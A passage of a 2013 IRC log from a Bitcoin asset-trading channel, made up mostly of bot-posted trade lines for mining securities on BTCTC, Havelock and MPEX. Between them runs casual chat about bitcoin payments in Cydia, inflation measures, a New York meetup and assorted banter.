0.037 BTC [+] Jul 22 20:53:59 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003701 = 0.037 BTC [+] Jul 22 20:54:21 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003701 = 0.037 BTC [+] Jul 22 20:54:48 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003701 = 0.037 BTC [+] Jul 22 20:55:17 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003701 = 0.037 BTC [+] Jul 22 20:55:21 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.0037 = 0.037 BTC [-] Jul 22 20:55:47 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003606 = 0.0361 BTC [-] Jul 22 20:55:49 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.003605 = 0.018 BTC [-] Jul 22 20:56:21 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003606 = 0.0361 BTC [+] Jul 22 20:56:45 [HAVELOCK] [AM100] 1 @ 0.0445 BTC [+] Jul 22 20:56:48 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003606 = 0.0361 BTC [+] Jul 22 20:57:16 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003606 = 0.0361 BTC [+] Jul 22 20:57:18 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003605 = 0.0361 BTC [-] Jul 22 20:57:20 [BTCTC] [TAT.VIRTUALMINE] 90 @ 0.0036 = 0.324 BTC [-] Jul 22 20:57:26 [BTCTC] [AMC-PT] 1 @ 0.003773 BTC [+] Jul 22 20:57:29 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003606 = 0.0361 BTC [+] Jul 22 20:57:41 [BTCTC] [AMC-PT] 1 @ 0.003773 BTC [+] Jul 22 20:57:55 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003601 = 0.036 BTC [-] Jul 22 20:58:26 [BTCTC] [PAJKA.BOND] 1 @ 0.04699 BTC [+] Jul 22 20:58:28 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003601 = 0.036 BTC [-] Jul 22 20:58:48 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003601 = 0.036 BTC [-] Jul 22 20:59:00 [BTCTC] [AMC-PT] 275 @ 0.003601 = 0.9903 BTC [-] Jul 22 20:59:49 [BTCTC] [AMC-PT] 550 @ 0.0036 = 1.98 BTC [-] Jul 22 21:03:14 [BTCTC] [AMC-PT] 155 @ 0.003593 = 0.5569 BTC [-] Jul 22 21:03:16 [BTCTC] [AMC-PT] 10 @ 0.003592 = 0.0359 BTC [-] Jul 22 21:03:18 [BTCTC] [AMC-PT] 50 @ 0.003592 = 0.1796 BTC [-] Jul 22 21:03:20 [BTCTC] [AMC-PT] 250 @ 0.00359 = 0.8975 BTC [-] Jul 22 21:03:22 [BTCTC] [AMC-PT] 500 @ 0.003581 = 1.7905 BTC [-] Jul 22 21:03:23 [BTCTC] [AMC-PT] 1500 @ 0.003577 = 5.3655 BTC [-] Jul 22 21:03:25 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003601 BTC [-] Jul 22 21:03:26 [BTCTC] [AMC-PT] 1000 @ 0.003525 = 3.525 BTC [-] Jul 22 21:03:27 [BTCTC] [AMC-PT] 100 @ 0.0035 = 0.35 BTC [-] Jul 22 21:03:29 [BTCTC] [AMC-PT] 420 @ 0.0035 = 1.47 BTC [-] Jul 22 21:03:31 [BTCTC] [AMC-PT] 1000 @ 0.0035 = 3.5 BTC [-] Jul 22 21:03:32 [BTCTC] [AMC-PT] 3300 @ 0.0035 = 11.55 BTC [-] Jul 22 21:04:34 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003601 = 0.036 BTC [-] Jul 22 21:04:56 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003601 = 0.036 BTC [-] Jul 22 21:05:28 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003601 = 0.036 BTC [-] Jul 22 21:05:44 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.0036 = 0.036 BTC [-] Jul 22 21:05:56 [BTCTC] [ASICMINER-PT] 2 @ 4.700002 = 9.4 BTC [-] Jul 22 21:06:17 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.003501 = 0.0175 BTC [-] Jul 22 21:06:50 [HAVELOCK] [AM100] 4 @ 0.0445 = 0.178 BTC [+] Jul 22 21:07:09 [BTCTC] [GSDPT] 100 @ 0.00334 = 0.334 BTC [-] Jul 22 21:08:18 [BTCTC] [DMS.SELLING] 44 @ 0.02559 = 1.126 BTC [+] Jul 22 21:10:02 [BTCTC] [DMS.MINING] 2 @ 0.0149 = 0.0298 BTC [+] Jul 22 21:10:26 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.003501 = 0.0175 BTC [-] Jul 22 21:10:40 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.003699 = 0.0074 BTC [+] Jul 22 21:13:12 [BTCTC] [AMC-PT] 50 @ 0.00345 = 0.1725 BTC [-] Jul 22 21:17:46 [BTCTC] [AMC-PT] 17 @ 0.0036 = 0.0612 BTC [+] Jul 22 21:18:39 [MPEX] [S.MPOE] 6450 @ 0.00080469 = 5.1903 BTC [+] Jul 22 21:26:53 slow day huh? Jul 22 21:27:12 was pretty busy earlier Jul 22 21:27:15 slowed down a good bit Jul 22 21:27:52 yeah Jul 22 21:28:16 i was just in the #cydia channel, on irc.saurik.com, asking if they could accept bitcoins Jul 22 21:31:57 what'd they say? Jul 22 21:32:06 it'd be awesome to get coins on the phone Jul 22 21:33:36 [BTCTC] [RSM] 1 @ 0.018899 BTC [+] Jul 22 21:34:37 It feels like a sushi kind of day for Lunch Jul 22 21:36:37 [HAVELOCK] [AM100] 8 @ 0.044783 = 0.3583 BTC [+] Jul 22 21:36:45 [BTCTC] [ASICMINER-PT] 2 @ 4.700002 = 9.4 BTC [-] Jul 22 21:36:49 [BTCTC] [ASICMINER-PT] 2 @ 4.700001 = 9.4 BTC [-] Jul 22 21:36:51 [BTCTC] [ASICMINER-PT] 2 @ 4.7 = 9.4 BTC [-] Jul 22 21:38:30 http://www.reddit.com/r/jailbreak/comments/155wcz/question_alternative_payment_services_in_cydia/ Jul 22 21:38:32 [Question] Alternative payment services in cydia? : jailbreak Jul 22 21:39:00 so i came back with "bitpay doesn't require you to even touch or see bitcoins, but you can offer customers privacy, and reach 3rd world, but only see pounds" Jul 22 21:39:14 i agree Jul 22 21:39:51 meh. Jul 22 21:40:08 i think compliance is overkill for small app devs. Jul 22 21:41:46 that is what i think Jul 22 21:41:51 think its silly Jul 22 21:42:03 but i told him that he can pretend they are only british pounds, euros and dollars Jul 22 21:42:09 and account away Jul 22 21:46:00 [BTCTC] [AMC-PT] 100 @ 0.00365 = 0.365 BTC [+] Jul 22 21:47:25 mhm Jul 22 21:47:44 i just declare them as income Jul 22 21:48:06 [MPEX] [S.MPOE] 2930 @ 0.0008044 = 2.3569 BTC [-] Jul 22 21:49:39 [BTCTC] [AMC-PT] 1 @ 0.003775 BTC [+] Jul 22 21:50:34 [BTCTC] [AMC-PT] 3 @ 0.0038 = 0.0114 BTC [+] Jul 22 21:51:31 [HAVELOCK] [AM100] 31 @ 0.044783 = 1.3883 BTC [+] Jul 22 21:51:55 [BTCTC] [DMS.SELLING] 271 @ 0.02559 = 6.9349 BTC [+] Jul 22 21:52:36 [BTCTC] [DMS.SELLING] 58 @ 0.02565 = 1.4877 BTC [+] Jul 22 21:53:05 [BTCTC] [TAT.ASICMINER] 125 @ 0.045971 = 5.7464 BTC [+] Jul 22 21:53:19 [BTCTC] [AMC-PT] 188 @ 0.0038 = 0.7144 BTC [+] Jul 22 21:53:21 [BTCTC] [AMC-PT] 1825 @ 0.003849 = 7.0244 BTC [+] Jul 22 21:53:23 [BTCTC] [AMC-PT] 390 @ 0.00385 = 1.5015 BTC [+] Jul 22 21:53:28 [BTCTC] [TAT.ASICMINER] 39 @ 0.045972 = 1.7929 BTC [+] Jul 22 21:53:28 Yes, let it grow Jul 22 21:54:20 [BTCTC] [DMS.SELLING] 20 @ 0.02565 = 0.513 BTC [+] Jul 22 21:54:21 [BTCTC] [TAT.ASICMINER] 39 @ 0.04599 = 1.7936 BTC [+] Jul 22 21:55:27 Not sure if this is any interest to anyone: http://sucuri.net/services/preventive Jul 22 21:56:57 [BTCTC] [AMC-PT] 18 @ 0.0038 = 0.0684 BTC [-] Jul 22 21:56:59 [BTCTC] [AMC-PT] 4982 @ 0.0038 = 18.9316 BTC [-] Jul 22 21:57:18 [BTCTC] [DMS.SELLING] 1 @ 0.02565 BTC [+] Jul 22 21:58:07 [BTCTC] [TAT.ASICMINER] 10 @ 0.04599 = 0.4599 BTC [+] Jul 22 21:59:18 [BTCTC] [BMF] 25 @ 0.0325 = 0.8125 BTC [-] Jul 22 21:59:58 good spot, TAT. Jul 22 22:00:01 thanks. Jul 22 22:00:24 dat waf. Jul 22 22:00:30 ;;calc 16.40 * .2 Jul 22 22:00:30 3.28 Jul 22 22:00:45 ;;calc 16.20 * .2 Jul 22 22:00:45 3.24 Jul 22 22:00:59 ;;google good tip Jul 22 22:01:00 What Is a Good Tip Amount? - Ronalfy.com: ; CNN/Money: How much to tip: ; How to Get a Good Tip as a Waiter: 7 Steps - wikiHow: Jul 22 22:01:12 [BTCTC] [AMC-PT] 500 @ 0.003989 = 1.9945 BTC [+] Jul 22 22:01:14 [BTCTC] [AMC-PT] 300 @ 0.003989 = 1.1967 BTC [+] Jul 22 22:05:37 [BTCTC] [DMS.PURCHASE] 2 @ 0.0394 = 0.0788 BTC [-] Jul 22 22:05:39 [BTCTC] [DMS.PURCHASE] 8 @ 0.039422 = 0.3154 BTC [+] Jul 22 22:07:39 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003506 = 0.0351 BTC [-] Jul 22 22:08:04 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.003505 = 0.3505 BTC [-] Jul 22 22:08:37 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0035 BTC [-] Jul 22 22:08:39 [BTCTC] [TAT.VIRTUALMINE] 89 @ 0.0035 = 0.3115 BTC [-] Jul 22 22:09:10 [BTCTC] [TAT.VIRTUALMINE] 11 @ 0.0035 = 0.0385 BTC [-] Jul 22 22:09:12 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.0034 = 0.34 BTC [-] Jul 22 22:09:14 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.0034 = 0.017 BTC [-] Jul 22 22:09:17 [BTCTC] [AMC-PT] 1 @ 0.004137 BTC [+] Jul 22 22:09:35 [BTCTC] [AMC-PT] 150 @ 0.004137 = 0.6206 BTC [+] Jul 22 22:12:47 [BTCTC] [TAT.ASICMINER] 3 @ 0.04599 = 0.138 BTC [+] Jul 22 22:14:53 http://www.reddit.com/r/jailbreak/comments/1itxhd/saurik_addressed_alternative_payments_but_why/ Jul 22 22:14:55 Saurik addressed alternative payments, but why couldn't Bitpay address his concerns? : jailbreak Jul 22 22:15:16 [BTCTC] [DMS.SELLING] 1 @ 0.02565 BTC [+] Jul 22 22:15:29 [BTCTC] [BITVPS] 10 @ 0.001901 = 0.019 BTC [-] Jul 22 22:15:37 [BTCTC] [BITVPS] 150 @ 0.0019 = 0.285 BTC [-] Jul 22 22:15:37 [BTCTC] [BITVPS] 1 @ 0.0019 BTC [-] Jul 22 22:15:38 [BTCTC] [BITVPS] 50 @ 0.001812 = 0.0906 BTC [-] Jul 22 22:15:40 [BTCTC] [BITVPS] 200 @ 0.001812 = 0.3624 BTC [-] Jul 22 22:15:42 [BTCTC] [BITVPS] 179 @ 0.001811 = 0.3242 BTC [-] Jul 22 22:15:51 [BTCTC] [AMC-PT] 2 @ 0.0041 = 0.0082 BTC [-] Jul 22 22:20:27 [BTCTC] [AMC-PT] 50 @ 0.004 = 0.2 BTC [-] Jul 22 22:20:58 [BTCTC] [AMC-PT] 49 @ 0.004099 = 0.2009 BTC [+] Jul 22 22:21:00 [BTCTC] [AMC-PT] 51 @ 0.0041 = 0.2091 BTC [+] Jul 22 22:21:28 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003683 = 0.0368 BTC [+] Jul 22 22:21:30 [BTCTC] [TAT.VIRTUALMINE] 17 @ 0.003684 = 0.0626 BTC [+] Jul 22 22:22:07 -christel- [Global Notice] Hi all, some of you may have been experiencing some temporary issues relating to SSL whilst we updated our certificates. Unfortunately this update was necessary for security reasons, you can read a bit more about the issues at http://blog.freenode.net/2013/07/server-hosting-and-trust/ - we apologise for the inconvenience and for the issue arising in the first place. Thank you for using freenode! Jul 22 22:22:34 [BTCTC] [AMC-PT] 20 @ 0.004 = 0.08 BTC [-] Jul 22 22:23:53 [HAVELOCK] [HIM] 1 @ 0.25 BTC [-] Jul 22 22:24:21 [BTCTC] [RSM] 6 @ 0.017869 = 0.1072 BTC [-] Jul 22 22:24:36 [BTCTC] [AMC-PT] 1 @ 0.004 BTC [-] Jul 22 22:25:25 [BTCTC] [AMC-PT] 50 @ 0.004 = 0.2 BTC [-] Jul 22 22:25:48 [HAVELOCK] [AM100] 50 @ 0.0445 = 2.225 BTC [-] Jul 22 22:26:05 [BTCTC] [AMC-PT] 58 @ 0.004 = 0.232 BTC [-] Jul 22 22:26:29 [BTCTC] [AMC-PT] 108 @ 0.004 = 0.432 BTC [-] Jul 22 22:27:44 [BTCTC] [AMC-PT] 713 @ 0.004 = 2.852 BTC [-] Jul 22 22:28:53 [BTCTC] [GSDPT] 200 @ 0.00334 = 0.668 BTC [-] Jul 22 22:29:47 [BTCTC] [AMC-PT] 1 @ 0.00399 BTC [-] Jul 22 22:30:36 [BTCTC] [AMC-PT] 199 @ 0.00399 = 0.794 BTC [-] Jul 22 22:30:44 [BTCTC] [AMC-PT] 1 @ 0.003989 BTC [-] Jul 22 22:31:36 [BTCTC] [AMC-PT] 100 @ 0.004 = 0.4 BTC [+] Jul 22 22:32:36 [BTCTC] [AMC-PT] 1200 @ 0.004 = 4.8 BTC [+] Jul 22 22:33:14 for a second there, i read that as 1200 @ .0048 Jul 22 22:33:29 would it be that surprising? Jul 22 22:33:48 AMC tripled in one night a few weeks ago Jul 22 22:33:50 Would be nice Jul 22 22:35:11 [BTCTC] [AMC-PT] 95 @ 0.0039 = 0.3705 BTC [-] Jul 22 22:39:16 [BTCTC] [TAT.ASICMINER] 3 @ 0.04594 = 0.1378 BTC [-] Jul 22 22:40:39 [BTCTC] [AMC-PT] 1073 @ 0.004097 = 4.3961 BTC [+] Jul 22 22:40:41 [BTCTC] [AMC-PT] 50 @ 0.004097 = 0.2049 BTC [+] Jul 22 22:40:58 [BTCTC] [TAT.ASICMINER] 3 @ 0.04594 = 0.1378 BTC [-] Jul 22 22:41:40 [BTCTC] [AMC-PT] 70 @ 0.004098 = 0.2869 BTC [+] Jul 22 22:41:52 [BTCTC] [AMC-PT] 30 @ 0.004098 = 0.1229 BTC [+] Jul 22 22:41:54 [BTCTC] [AMC-PT] 47 @ 0.0041 = 0.1927 BTC [+] Jul 22 22:41:55 [BTCTC] [AMC-PT] 2000 @ 0.0041 = 8.2 BTC [+] Jul 22 22:41:57 [BTCTC] [AMC-PT] 70 @ 0.0041 = 0.287 BTC [+] Jul 22 22:44:20 [BTCTC] [BASIC-MINING] 3 @ 0.585001 = 1.755 BTC [-] Jul 22 22:44:57 [BTCTC] [AMC-PT] 400 @ 0.004099 = 1.6396 BTC [-] Jul 22 22:45:43 [BTCTC] [ASICMINER-PT] 4 @ 4.699103 = 18.7964 BTC [-] Jul 22 22:45:46 [BTCTC] [ASICMINER-PT] 3 @ 4.699102 = 14.0973 BTC [-] Jul 22 22:45:48 [BTCTC] [ASICMINER-PT] 5 @ 4.6991 = 23.4955 BTC [-] Jul 22 22:45:50 [BTCTC] [ASICMINER-PT] 1 @ 4.699 BTC [-] Jul 22 22:47:17 [BTCTC] [AMC-PT] 1030 @ 0.0041 = 4.223 BTC [+] Jul 22 22:48:47 [BTCTC] [AMC-PT] 199 @ 0.004 = 0.796 BTC [-] Jul 22 22:50:02 [BTCTC] [AMC-PT] 100 @ 0.0041 = 0.41 BTC [+] Jul 22 22:50:50 [BTCTC] [AMC-PT] 700 @ 0.0041 = 2.87 BTC [+] Jul 22 22:51:03 [BTCTC] [AMC-PT] 100 @ 0.0041 = 0.41 BTC [+] Jul 22 22:51:59 [BTCTC] [TAT.ASICMINER] 16 @ 0.045551 = 0.7288 BTC [-] Jul 22 22:52:03 [BTCTC] [AMC-PT] 4051 @ 0.004 = 16.204 BTC [-] Jul 22 22:52:05 [BTCTC] [AMC-PT] 1000 @ 0.003901 = 3.901 BTC [-] Jul 22 22:52:06 [BTCTC] [AMC-PT] 949 @ 0.0039 = 3.7011 BTC [-] Jul 22 22:52:36 [BTCTC] [TAT.ASICMINER] 12 @ 0.04555 = 0.5466 BTC [-] Jul 22 22:52:38 [BTCTC] [AMC-PT] 1010 @ 0.004 = 4.04 BTC [+] Jul 22 22:52:39 [BTCTC] [AMC-PT] 13 @ 0.00409 = 0.0532 BTC [+] Jul 22 22:53:43 [BTCTC] [AMC-PT] 84 @ 0.004 = 0.336 BTC [-] Jul 22 22:53:45 [BTCTC] [AMC-PT] 1487 @ 0.00409 = 6.0818 BTC [+] Jul 22 22:55:06 [BTCTC] [AMC-PT] 1000 @ 0.00412 = 4.12 BTC [+] Jul 22 22:55:07 [BTCTC] [BASIC-MINING] 1 @ 0.638998 BTC [+] Jul 22 22:55:09 [BTCTC] [AMC-PT] 50 @ 0.004125 = 0.2063 BTC [+] Jul 22 22:55:36 [BTCTC] [ASICMINER-PT] 2 @ 4.695101 = 9.3902 BTC [-] Jul 22 22:55:38 [BTCTC] [ASICMINER-PT] 3 @ 4.680003 = 14.04 BTC [-] Jul 22 22:55:40 [BTCTC] [ASICMINER-PT] 1 @ 4.68 BTC [-] Jul 22 22:56:08 [BTCTC] [AMC-PT] 156 @ 0.0039 = 0.6084 BTC [-] Jul 22 22:56:10 [BTCTC] [AMC-PT] 2500 @ 0.0039 = 9.75 BTC [-] Jul 22 22:56:12 [BTCTC] [AMC-PT] 500 @ 0.003761 = 1.8805 BTC [-] Jul 22 22:56:13 [BTCTC] [AMC-PT] 1000 @ 0.00376 = 3.76 BTC [-] Jul 22 22:56:15 [BTCTC] [AMC-PT] 42 @ 0.00375 = 0.1575 BTC [-] Jul 22 22:56:22 [BTCTC] [AMC-PT] 1000 @ 0.00375 = 3.75 BTC [-] Jul 22 22:56:25 [BTCTC] [AMC-PT] 743 @ 0.003701 = 2.7498 BTC [-] Jul 22 22:56:33 [BTCTC] [AMC-PT] 6799 @ 0.0037 = 25.1563 BTC [-] Jul 22 22:56:57 [BTCTC] [AMC-PT] 34 @ 0.004125 = 0.1403 BTC [+] Jul 22 22:57:13 [MPEX] [S.MPOE] 1094 @ 0.0008044 = 0.88 BTC [-] Jul 22 22:57:15 [MPEX] [S.MPOE] 4556 @ 0.00080322 = 3.6595 BTC [-] Jul 22 22:57:43 ;;bcstats Jul 22 22:57:46 Current Blocks: 247978 | Current Difficulty: 3.125696072776893E7 | Next Difficulty At Block: 249983 | Next Difficulty In: 2005 blocks | Next Difficulty In About: 1 week, 4 days, 7 hours, 51 minutes, and 51 seconds | Next Difficulty Estimate: 34251363.2603 | Estimated Percent Change: 9.57995 Jul 22 22:58:00 ;;nethash Jul 22 22:58:01 246386.033254 Jul 22 22:58:30 [HAVELOCK] [AM100] 2 @ 0.0445 = 0.089 BTC [-] Jul 22 22:58:34 ;;ticker Jul 22 22:58:35 MtGox BTCUSD ticker | Best bid: 91.67939, Best ask: 91.78880, Bid-ask spread: 0.10941, Last trade: 91.78880, 24 hour volume: 8005.83782962, 24 hour low: 88.15504, 24 hour high: 92.00000, 24 hour vwap: 91.31701 Jul 22 22:58:38 now we've done it all Jul 22 22:59:13 together we form knowtron! Jul 22 23:00:25 Long Live ThickAsThieves !!! Jul 22 23:00:42 nice guys Jul 22 23:01:23 lol you seem morbidly bored Jul 22 23:01:36 me? Jul 22 23:01:48 [BTCTC] [B.YABMC] 169 @ 0.0027 = 0.4563 BTC [-] Jul 22 23:01:52 i dun understand any of this Jul 22 23:02:27 excited by bcstats && nethash && ticker trifecta Jul 22 23:02:39 PirateKitteh, what's your deal? Jul 22 23:02:51 [BTCTC] [COGNITIVE] 1 @ 0.809994 BTC [+] Jul 22 23:03:08 are you my biggest fan? Jul 22 23:03:35 ass pull? Jul 22 23:03:43 ask poll? Jul 22 23:03:54 poll tug? Jul 22 23:04:02 pole* Jul 22 23:05:39 [HAVELOCK] [AM100] 20 @ 0.044 = 0.88 BTC [-] Jul 22 23:05:44 [BTCTC] [TAT.ASICMINER] 2 @ 0.045911 = 0.0918 BTC [+] Jul 22 23:05:48 My deal, ThickAsThieves ? Just a big fan Jul 22 23:06:01 cant tell if youre mocking me Jul 22 23:06:09 but i'm okay either eay Jul 22 23:06:11 way Jul 22 23:06:22 God no! I love Havelock and TAT Jul 22 23:06:42 [BTCTC] [AMC-PT] 1 @ 0.004059 BTC [-] Jul 22 23:06:54 [BTCTC] [AMC-PT] 150 @ 0.00375 = 0.5625 BTC [-] Jul 22 23:06:56 [HAVELOCK] [SMG] 2920 @ 0.00026 = 0.7592 BTC [-] Jul 22 23:08:10 done, mind you: split by 100 https://bitfunder.com/asset/CoinBr.iDiff-O Jul 22 23:09:27 [BTCTC] [ASICMINER-PT] 1 @ 4.6601 BTC [-] Jul 22 23:10:03 [MPEX] [S.MPOE] 9020 @ 0.00080469 = 7.2583 BTC [+] Jul 22 23:10:41 [BTCTC] [PAJKA.BOND] 10 @ 0.0422 = 0.422 BTC [-] Jul 22 23:10:41 [BTCTC] [PAJKA.BOND] 4 @ 0.0421 = 0.1684 BTC [-] Jul 22 23:10:41 [BTCTC] [PAJKA.BOND] 1 @ 0.04202 BTC [-] Jul 22 23:10:41 [BTCTC] [PAJKA.BOND] 2 @ 0.042018 = 0.084 BTC [-] Jul 22 23:10:42 [BTCTC] [PAJKA.BOND] 10 @ 0.042 = 0.42 BTC [-] Jul 22 23:10:47 [HAVELOCK] [HIM] 3 @ 0.251 = 0.753 BTC [+] Jul 22 23:11:02 lmao knowtron Jul 22 23:11:07 [BTCTC] [TAT.ASICMINER] 3 @ 0.045911 = 0.1377 BTC [+] Jul 22 23:11:27 69! Jul 22 23:11:32 defender of the universe Jul 22 23:11:52 Jurov you know what would be awesome Jul 22 23:12:07 if yo projected how many diff changes are between issue date and close date Jul 22 23:12:19 at 3 %s of diff Jul 22 23:12:24 so i dont have to Jul 22 23:13:15 lol Jul 22 23:14:01 mircea_popescu: X.IDIFF sold out or are they just not calculable right now? Jul 22 23:14:11 incalculable risk! Jul 22 23:14:55 ;;calc (95-88.48) Jul 22 23:14:56 6.52 Jul 22 23:14:57 [BTCTC] [DMS.MINING] 1 @ 0.01421 BTC [-] Jul 22 23:14:59 [BTCTC] [DMS.MINING] 1 @ 0.01421 BTC [-] Jul 22 23:15:01 [BTCTC] [DMS.MINING] 6 @ 0.014101 = 0.0846 BTC [-] Jul 22 23:15:01 [BTCTC] [DMS.MINING] 100 @ 0.014 = 1.4 BTC [-] Jul 22 23:15:04 FabianB_, mircea_popescu does not market make them Jul 22 23:15:07 ;;calc 6.52/95 Jul 22 23:15:07 0.0686315789474 Jul 22 23:15:18 and i made my own instead Jul 22 23:15:26 FabianB_ i think nobody's selling any Jul 22 23:15:34 ;;calc .0686315789474 * 3 Jul 22 23:15:35 0.205894736842 Jul 22 23:15:36 i don't have a diffbot Jul 22 23:15:43 ah, ic, there's no bot as with the options Jul 22 23:15:45 20.5% not too shabby :) Jul 22 23:15:47 nope. Jul 22 23:15:55 http://trilema.com/2013/the-wonder-of-inflation/#comment-94040 Jul 22 23:15:59 The wonder of inflation pe Trilema - Un blog de Mircea Popescu. Jul 22 23:16:00 [HAVELOCK] [AM100] 1 @ 0.0441 BTC [+] Jul 22 23:16:02 this discussion is actually pretty cool. anyone know the pole ? Jul 22 23:16:11 Mateusz Wywial Jul 22 23:17:07 if mp enjoys talking to someone, you KNOW it's a sock Jul 22 23:17:44 ;) Jul 22 23:17:44 [BTCTC] [TAT.ASICMINER] 10 @ 0.045551 = 0.4555 BTC [-] Jul 22 23:17:46 [BTCTC] [TAT.ASICMINER] 21 @ 0.04555 = 0.9566 BTC [-] Jul 22 23:17:48 [BTCTC] [TAT.ASICMINER] 10 @ 0.045401 = 0.454 BTC [-] Jul 22 23:17:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.0454 BTC [-] Jul 22 23:17:53 [BTCTC] [TAT.ASICMINER] 6 @ 0.045392 = 0.2724 BTC [-] Jul 22 23:17:55 [BTCTC] [TAT.ASICMINER] 52 @ 0.04539 = 2.3603 BTC [-] Jul 22 23:18:15 lmao Jul 22 23:18:23 mircea_popescu: i would like to see the inflation number in weimar germany using this measure Jul 22 23:18:24 [BTCTC] [DMS.MINING] 5 @ 0.0149 = 0.0745 BTC [+] Jul 22 23:18:32 the actual number Jul 22 23:18:34 mjr_ which one ? Jul 22 23:18:37 just would make a good stat Jul 22 23:18:45 CPI, not counting food and energy Jul 22 23:18:50 [BTCTC] [ASICMINER-PT] 1 @ 4.684999 BTC [+] Jul 22 23:18:54 taking into account substitution Jul 22 23:19:15 [BTCTC] [DMS.MINING] 4 @ 0.01495 = 0.0598 BTC [+] Jul 22 23:19:26 i think it would be telling if you can show concretely that using those (relatively new inventions in the CPI) I could make an obvious example look secure Jul 22 23:19:45 a a Jul 22 23:19:49 probably pretty stable Jul 22 23:20:03 no wait. we have the testimony of maria rilke Jul 22 23:20:10 the CPI used to be sacred I think Jul 22 23:20:16 apparently tombstones cost a barrowful of money early in the day Jul 22 23:20:23 but a truckload of money by evening Jul 22 23:20:32 [BTCTC] [DMS.MINING] 14 @ 0.01497 = 0.2096 BTC [+] Jul 22 23:20:32 [BTCTC] [DMS.MINING] 19 @ 0.01497 = 0.2844 BTC [+] Jul 22 23:20:36 plastic tombstones? Jul 22 23:20:53 joking of course Jul 22 23:22:06 in 2010: suggested a transition to using a "chained CPI" in 2010, when they headed the White House’s deficit-reduction commission. which "saves" the govt 290 billion...how convenient Jul 22 23:22:35 i suggest a reduction in the population of the chickens said the wolves who headed up the wolf feeding commission Jul 22 23:22:45 anyways, time for satoshi square Jul 22 23:23:07 it's at EVR today, for any new yorkers aorund Jul 22 23:23:21 5-7 Jul 22 23:23:50 enjoy! Jul 22 23:24:08 yes, good luck! Jul 22 23:25:11 oh and mircea_popescu , withdrawals pls... seems some folks were not interested in anything other than s.dice and are closing accounts Jul 22 23:25:20 [BTCTC] [DMS.MINING] 10 @ 0.014979 = 0.1498 BTC [+] Jul 22 23:25:21 for shame Jul 22 23:26:32 [BTCTC] [DMS.MINING] 1 @ 0.014979 BTC [+] Jul 22 23:27:02 [BTCTC] [TAT.ASICMINER] 6 @ 0.04591 = 0.2755 BTC [+] Jul 22 23:28:07 [BTCTC] [TAT.ASICMINER] 1 @ 0.045911 BTC [+] Jul 22 23:28:09 [BTCTC] [TAT.ASICMINER] 23 @ 0.045911 = 1.056 BTC [+] Jul 22 23:28:42 [MPEX] [S.MPOE] 400 @ 0.00080469 = 0.3219 BTC [+] Jul 22 23:29:05 [BTCTC] [DMS.MINING] 3 @ 0.014979 = 0.0449 BTC [+] Jul 22 23:29:56 [BTCTC] [TAT.ASICMINER] 4 @ 0.045911 = 0.1836 BTC [+] Jul 22 23:30:24 [BTCTC] [AMC-PT] 39 @ 0.004 = 0.156 BTC [+] Jul 22 23:30:34 mjr_ pm Jul 22 23:30:39 if ur still here Jul 22 23:31:12 [BTCTC] [AMC-PT] 7 @ 0.004 = 0.028 BTC [+] Jul 22 23:31:58 you'll prolly have to send it by carrier pigeons to evr Jul 22 23:32:17 maybe he'll IRC on his celly Jul 22 23:32:47 i don't think people can carry their phones around in ny Jul 22 23:32:52 because of the muggers Jul 22 23:33:01 that bad now? Jul 22 23:33:02 i think everyone in ny keeps his mobile chained to the power outlet. Jul 22 23:33:02 hehe Jul 22 23:33:27 if they can afford to live in NY they can afford to have spare cells Jul 22 23:33:33 http://upload.wikimedia.org/wikipedia/commons/0/03/TPainVMASept08.jpg Jul 22 23:33:36 [BTCTC] [TAT.ASICMINER] 3 @ 0.0459 = 0.1377 BTC [-] Jul 22 23:33:43 did this dude blow a leprechaun or wtf happened to his mouth Jul 22 23:33:52 [BTCTC] [DMS.PURCHASE] 32 @ 0.039422 = 1.2615 BTC [+] Jul 22 23:33:53 [BTCTC] [BASIC-MINING] 2 @ 0.63899 = 1.278 BTC [-] Jul 22 23:33:55 [BTCTC] [BASIC-MINING] 3 @ 0.638991 = 1.917 BTC [+] Jul 22 23:33:56 [BTCTC] [BASIC-MINING] 1 @ 0.639 BTC [+] Jul 22 23:33:57 [BTCTC] [BASIC-MINING] 1 @ 0.64 BTC [+] Jul 22 23:33:59 [BTCTC] [BASIC-MINING] 1 @ 0.64389 BTC [+] Jul 22 23:34:00 [BTCTC] [BASIC-MINING] 1 @ 0.6439 BTC [+] Jul 22 23:34:02 [BTCTC] [AMC-PT] 1 @ 0.004 BTC [+] Jul 22 23:34:02 lol Jul 22 23:34:08 its a grill yo Jul 22 23:34:13 never seen that before? Jul 22 23:34:21 must be torture to wear Jul 22 23:34:22 i did Jul 22 23:34:32 they just never looked like a gargle of leprechaun cum before. Jul 22 23:34:52 [BTCTC] [DMS.PURCHASE] 125 @ 0.039422 = 4.9278 BTC [+] Jul 22 23:35:05 [BTCTC] [BASIC-MINING] 1 @ 0.638989 BTC [-] Jul 22 23:35:15 There's an image Jul 22 23:36:26 [HAVELOCK] [AM100] 31 @ 0.044698 = 1.3856 BTC [+] Jul 22 23:37:59 [HAVELOCK] [HIM] 